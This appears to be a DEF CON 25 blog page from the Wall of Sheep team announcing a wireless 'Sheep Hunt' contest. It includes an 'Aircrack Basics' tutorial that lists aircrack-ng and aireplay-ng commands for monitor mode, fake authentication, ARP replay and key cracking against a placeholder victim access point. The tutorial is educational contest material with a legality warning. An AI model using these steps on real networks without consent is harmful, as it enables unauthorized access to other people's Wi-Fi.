2017-07-27

DEFCON 25: SHEEP HUNT 2017



SHEEP HUNT 2017
The Wall of Sheep (WOS)
Packet Hacking Village (PHV)

It is time to scour the DEF CON airwaves for lost SHEEPS. Collect clues by playing and solving the different Sheep Hunt challenges.  ALL SKILL LEVELS ARE WELCOME! From n00b to 1337!

REGISTER NOW!    

GEAR NEEDED
     Laptop w/ Kali + wireless sniffing capabilities
     RF Devices - RTL-SDR, HackRFOne, UberTooth, YardStickOne…
     iPhone / Android w/ QRCode and/or RFiD scanners apps

USE OUR GEAR:

We get it! Who in their right mind would scan DEF CON’s wireless networks?  Ask a Sheep Hunt volunteer, and we’ll get you started.  (First come, First serve. Limited time use gear.)

THE SHEEP LIST

1.      QR: Hunt for QRCodes and scan for clues! Earn points by deciphering the clues.
*QRCode scanner apps work in AIRPLANE MODE or with your mobile data turned-off.

2. NFC: Hunt for NFC tags hidden in the PHV, the Wall of Sheep, or on PHV staff.  Earn points by deciphering the clues.  *NFC scanner apps should work in AIRPLANE MODE or with your mobile data off.

3. RF: Hunt for RF beacons hidden around the DEF CON hallways. Use our military-grade RF gear.  Listen and decipher the secret messages by using RF scanners.

4. AP: Find the correct SHEEP HUNT APs and start cracking.   Every key you crack & submit earns you points.  Clues to identify the correct APs are in the QR, NFC and RF challenges.


For hints follow @wallofsheep on Twitter

Hashtag #WOSSH #PHV #WOS
Posted by at
Labels: , , , , ,

DEFCON 25: Aircrack Basics


NOTE: The instructions below are for concept learning and education purposes only. It is illegal to hack an access point without the owner’s consent.

PHASE 1 – Monitor Mode

OPEN A TERMINAL WINDOW (Terminal 1)

1.    To set your wireless interface to monitor mode.
airmon-ng start [interface]
2.    Start monitoring the wireless traffic, and save it to a file.
airodump-ng [interface] -w [filename] [interface]

PHASE 2 Generate IVs

OPEN A SECOND TERMINAL WINDOW (Terminal 2)

1.    Generate IVs (Initialization Vectors) by using “aireplay-ng”.
2.  Type: aireplay-ng --help to see the syntax and switches.
2.    Test the target’s ability for accept packet injection, type:
aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]
-The ideal outcome is for a 100% injection result.
3.    List the aireplay-ng help to view the attack modes available.  Be patient and creative. Here are some examples below:  

Fake Authentication with target AP

Ex.1 - aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

Ex.2 - aireplay-ng -1 6000 -o 1 -q 10 e [vic ssid] -a [vic mac] -h [your mac] [interface]


Standard ARP-request replay

aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

PHASE 3 - Cracking

OPEN A THIRD TERMINAL WINDOW (Terminal 3)
1.    Start cracking, type: aircrack-ng [filename] – Filename is the location and name of the file you are dumping from Terminal 1.

2.    Pick the target SSID to start cracking.

 OR use WIFITE
Posted by at
Labels: , , ,

2017-07-16

DEFCON 25: Ides of Defcon Badge

Unlock Codes?! Yes please! Let the games begin... details to follow after the con.... 


Posted by at
Labels: , , , , , ,
Subscribe to: Posts (Atom)